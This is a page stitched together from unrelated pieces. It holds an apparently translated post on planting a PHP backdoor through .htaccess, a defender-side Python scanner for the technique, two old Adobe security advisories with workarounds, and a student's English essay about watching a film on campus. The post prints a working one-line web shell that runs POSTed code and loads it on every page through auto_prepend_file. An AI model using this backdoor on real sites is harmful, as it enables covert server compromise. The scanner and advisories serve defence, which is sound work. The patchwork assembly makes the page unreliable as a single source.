.htaccess backdoor

 
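The PHP manual: there is something new every time you reread it :)
PHP has a feature whereby settings in Apache's httpd.conf and .htaccess override the values in its own php.ini.
As it happens, I found two evil directives:
auto_prepend_file string
Specifies the name of a file that is automatically parsed before the main file. The file is included as if it had been called with the include() function, so include_path is used.
The special value none disables auto-prepending.
auto_append_file string
Specifies the name of a file that is automatically parsed after the main file. The file is included as if it had been called with the include() function, so include_path is used.
The special value none disables auto-appending.
Note: If the script is terminated with exit(), auto-append will not occur.
So it is simple: a .htaccess file is enough to include a file, without modifying any of the other party's PHP files, and every PHP file in the same directory is then trojaned. An administrator who is not paying attention may well overlook it.
I tested this locally by writing a .htaccess file into my sphpblog directory:
#<?php eval($_POST[cmd]);?>
php_value auto_prepend_file ".htaccess"
Then request any file in sphpblog.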

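Of course, including the .htaccess file directly is too obvious: the pile of unrelated output and error messages it produces will give your backdoor away. This is only a PoC; what to include is up to you.
Oh, and one more thing that comes in handy:
include_path ".;/path/to/php/pear" PHP_INI_ALL
I won't spell out what it means; work it out for yourselves, heh.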
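
A defender-side check for the technique described above, as an added example that is not part of the original post: it scans .htaccess files for the auto_prepend_file, auto_append_file and include_path overrides and for embedded PHP tags. The function names and the sample .htaccess content are constructed for illustration.

```python
import os
import re

# Directives named in the post that let .htaccess change what PHP includes.
RISKY = re.compile(
    r'^\s*php_(?:value|flag)\s+'
    r'(auto_prepend_file|auto_append_file|include_path)\s+(.+?)\s*$',
    re.IGNORECASE)
# PHP open tags have no business in an Apache config file, even in a comment.
PHP_TAG = re.compile(r'<\?(?:php|=)', re.IGNORECASE)

# Constructed sample input (not from a real site); the PHP body is a placeholder.
SAMPLE = '''# constructed sample
#<?php /* placeholder body */ ?>
php_value auto_prepend_file ".htaccess"
php_value auto_append_file none
php_value include_path ".:/var/www/lib"
RewriteEngine On
'''

def scan_htaccess(text):
    """Return (line_no, kind, detail) findings for one .htaccess body."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        m = RISKY.match(line)
        if m:
            kind, value = m.group(1).lower(), m.group(2).strip('"\'')
            # The special value "none" only disables auto prepend/append.
            if kind == 'include_path' or value.lower() != 'none':
                findings.append((no, kind, value))
        if PHP_TAG.search(line):
            findings.append((no, 'php_tag', line.strip()))
    return findings

def scan_tree(root):
    """Walk a web root (hypothetical path) and scan every .htaccess found."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        if '.htaccess' in files:
            path = os.path.join(dirpath, '.htaccess')
            with open(path, encoding='utf-8', errors='replace') as fh:
                hits = scan_htaccess(fh.read())
            if hits:
                report[path] = hits
    return report

if __name__ == '__main__':
    for finding in scan_htaccess(SAMPLE):
        print(finding)
```

These directives only take effect where Apache permits .htaccess overrides, so setting AllowOverride None in httpd.conf for directories that do not need them removes the mechanism altogether.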

Multiple buffer overflow vulnerabilities in Adobe Form Designer and Form Client

 
Affected systems:
Adobe Form Designer/Client 5.0
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 28210
CVE(CAN) ID: CVE-2007-6253

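Adobe Form Designer is a member of the Adobe Designer product family, used to automatically generate forms and to capture and process data.

Adobe Form Designer and its client ship several ActiveX controls. Buffer overflow vulnerabilities exist in the Adobe File Dialog Button control provided by the FileDlg.dll library and in the Adobe Copy to Server object provided by the SvrCopy.dll library. If a user is tricked into visiting a malicious web page, these overflows can be triggered, leading to arbitrary code execution.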

<*Source: Will Dormann

Links: http://secunia.com/advisories/29330/
http://www.kb.cert.org/vuls/id/362849
http://www.adobe.com/support/security/bulletins/apsb08-09.html
*>

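Recommendations:
--------------------------------------------------------------------------------
Temporary workaround:

* Disable the Adobe Form ActiveX controls in IE by setting the kill bit for the following CLSIDs: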

{00A2A192-4929-11D1-BA6C-080009D7FAD2}
{D10E546F-3AF9-11D1-BA6C-080009D7FAD2}

Alternatively, save the following text as a .REG file or import it:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{00A2A192-4929-11D1-BA6C-080009D7FAD2}]
"Compatibility Flags"=dword:00000400

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{D10E546F-3AF9-11D1-BA6C-080009D7FAD2}]
"Compatibility Flags"=dword:00000400

Vendor patch:

Adobe
-----
The vendor has released an upgrade patch that fixes this security issue; download it from the vendor's site:

http://download.adobe.com/pub/adobe/server/formclient/win/p_des_5_0_5990.zip
http://download.adobe.com/pub/adobe/server/formclient/win/p5_0_5990.zip

Multiple cross-site scripting and ineffective logging vulnerabilities in Adobe ColdFusion

 
Affected systems:
Adobe ColdFusion MX 7.02
Adobe ColdFusion MX 7.01
Adobe ColdFusion MX 7.00
Adobe ColdFusion 8
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 28205,28207
CVE(CAN) ID: CVE-2008-0643,CVE-2008-0644,CVE-2008-1203

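ColdFusion MX is an efficient development environment for web application servers, easy to use and productive to develop with; it is based on standard Java technology and integrates with XML, Web Services and Microsoft .NET environments.

If a ColdFusion application's Application.cfm or Application.cfc contains the setEncoding function, a remote attacker can carry out cross-site scripting attacks by submitting malicious requests.

ColdFusion returns certain CGI variables to the user without filtering them properly, which allows a remote attacker to carry out cross-site scripting by tampering with the User Agent, injecting and executing arbitrary HTML and script code in the user's browser session.

ColdFusion does not log failed login attempts to the administration interface, which may make it easier for an attacker to carry out brute-force guessing attacks.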

<*Source: Shigeyoshi Muraoka

Links: http://secunia.com/advisories/29332/
http://www.adobe.com/support/security/bulletins/apsb08-06.html
http://www.adobe.com/support/security/bulletins/apsb08-07.html
http://www.adobe.com/support/security/bulletins/apsb08-08.html
*>

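Recommendations:
--------------------------------------------------------------------------------
Vendor patch:

Adobe
-----
The vendor has released an upgrade patch that fixes this security issue; download it from the vendor's site: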

http://www.adobe.com/support/coldfusion/ts/documents/kb403212/hf702-70734.zip
http://www.adobe.com/support/coldfusion/ts/documents/kb403070/chf8000003.zip
http://www.adobe.com/support/security/bulletins/downloads/CF8_APSB08-0_8.zip
http://www.adobe.com/support/security/bulletins/downloads/CFMX7_APSB08_-08.zip

Instructor: 任一涛

20041050098

Choose one of the two topics

1. One day life at campus

2. An interesting thing I remembered at campus

I chose topic 2 and scored 91.

An interesting thing I remembered at campus

        The interesting thing I remembered at campus is watching “The Lord of the Ring”.

        It happened when I was in grade one in college. I was a new student on the campus. I was curious about everything. A new man needn’t do many things, so I always had a lot of spare time. Occasionally, I saw a notice saying the movie “The Lord of the Ring” was being shown every Sunday night from 19:00 to 22:00. I went there on time.

        I was surprised that there were only a couple of students. I had thought that there would be so many students that I would have to sit at the back. I took my seat in the front. The movie had already begun. What impressed me was not the movie, but the environment. I had watched the movie on TV before. It was a good movie that I still like. But the environment really gave me more than I expected. The silent room, few people, gloomy light, the big screen and the perfect sound effect. It brought me into the middle land and into the legend.

        I enjoyed it and went there every Sunday night. It never let me down. Till now, I still cannot forget that environment. It has been stored in my brain like a brilliant art.